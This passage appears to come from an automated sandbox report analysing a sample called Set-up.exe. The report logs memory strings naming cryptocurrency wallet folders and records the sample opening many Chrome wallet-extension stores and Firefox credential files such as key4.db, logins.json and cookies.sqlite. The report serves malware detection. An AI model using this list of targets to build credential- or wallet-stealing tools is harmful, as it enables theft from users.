            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\All Users\AppData\Roaming\Binance
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Roaming\Ethereum
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Roaming\Coinomi\Coinomi\wallets
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Roaming\MultiDoge
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: seed.seco
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: keystore
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Roaming\Ledger Live
            Source: Set-up.exe, 00000000.00000002.1544669791.0000000004100000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Publicp.inir......All UsersAll Users\??\C:\Users\All Users\??\C:\Users\All UsersDefaultDefault\??\C:\Users\Default\??\C:\Users\DefaultDefault UserDefault User\??\C:\Users\Default User\??\C:\Users\Default Userdesktop.inidesktop.ini\??\C:\Users\desktop.iniuseruser\??\C:\Users\user\??\C:\Users\userPublicPublic\??\C:\Users\Public\??\C:\Users\Public\??\C:\Users\All Users\AppData\??\C:\Users\All Users\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\All Users\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Default\AppData\??\C:\Users\Default\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Default\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Default User\AppData\??\C:\Users\Default User\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Default User\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\user\AppData\??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Public\AppData\??\C:\Users\Public\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Public\AppData\Roaming\Electrum-LTC\wallets I
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mjdmgoiobnbombmnbbdllfncjcmopfncJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klghhnkeealcohjjanjjdaeeggmfmlplJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkkJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ljfpcifpgbbchoddpjefaipoiigpdmagJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nihlebdlccjjdejgocpogfpheakkpodbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdgbckgdncnhihllonhnjbdoighgpimkJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjoJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bopcbmipnjdcdfflfgjdgdjejmgpoaabJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\Mozilla\Firefox\Profiles\Local StateJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\Mozilla\Firefox\Profiles\Local StateJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmgJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfndJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lfochlioelphaglamdcakfjemolpichkJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\Mozilla\Firefox\Profiles\Local StateJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ldpmmllpgnfdjkmhcficcifgoeopnodcJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafchJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\iodngkohgeogpicpibpnaofoeifknfdoJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fmhjnpmdlhokfidldlglfhkkfhjdmhglJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmphdnilpmdejikjdnlbcnmnabepfgkhJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mbcafoimmibpjgdjboacfhkijdkmjocdJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjcaJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fldfpgipfncgndfolcbkdeeknbbbnhccJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jhfjfclepacoldmjmkmdlmganfaalklbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmjmllblpcbmniokccdoaiahcdajdjofJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flhbololhdbnkpnnocoifnopcapiekdiJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\njojblnpemjkgkchnpbfllpofaphbokkJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieafJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fiikommddbeccaoicoejoniammnalkfaJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cfhdojbkjhnklbpkdaibdccddilifddbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Local StateJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfkJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\khpkpbbcccdmmclmpigdgddabeilkdpdJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijpdbdidkomoophdnnnfoancpbbmpfcnJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mdjmfdffdcmnoblignmgpommbefadffdJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdfigkbdjmhpdgffnbdbicdmimfikfigJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\omaabbefbmiijedngplfjmnooppbclkkJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpmkedoipcpimgecpmgpldfpohjplkppJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\djclckkglechooblngghdinmeemkbgciJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jfdlamikmbghhapbgfoogdffldioobglJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\chgfefjpcobfbnpmiokfjjaglahmndedJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpeiJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bifidjkcdpgfnlbcjpdkdcnbiooooblgJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliobJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbkfoedolllekgbhcbcoahefnbanhhlhJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onapnnfmpjmbmdcipllnjmjdjfonfjdmJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key3.dbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oiaanamcepbccmdfckijjolhlkfocbgjJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ogphgbfmhodmnmpnaadpbdadldbnmjjiJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\enabgbdfcbaehmbigakijjabdpdnimlgJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnkelfanjkeadonecabehalmbgpfodjmJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hhmkpbimapjpajpicehcnmhdgagpfmjcJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ckdjpkejmlgmanmmdfeimelghmdfeobeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojhpaddibjnpiefjkbhkfiaedepjhecaJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\iokeahhehimjnekafflcihljlcjccdbeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmmkllgcgpldbblpnhghdojehhfafhroJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cfdldlejlcgbgollnbonjgladpgeogabJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ekkhlihjnlmjenikbgmhgjkknoelfpedJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcjginnbdlkdnnahogchmeidnmfckjomJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kbdcddcmgoplfockflacnnefaehaiocbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kgdijkcfiglijhaglibaidbipiejjfdpJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilbibkgkmlkhgnpgflcjdfefbkpehoomJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkhmbjifakpikpapdiaepgkdephjgnmaJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnefghmjgbmpkjjfhefnenfnejdjneogJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbhJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcoblJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\llalnijpibhkmpdamakhgmcagghgmjabJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nebnhfamliijlghikdgcigoebonmoibmJump to behavior
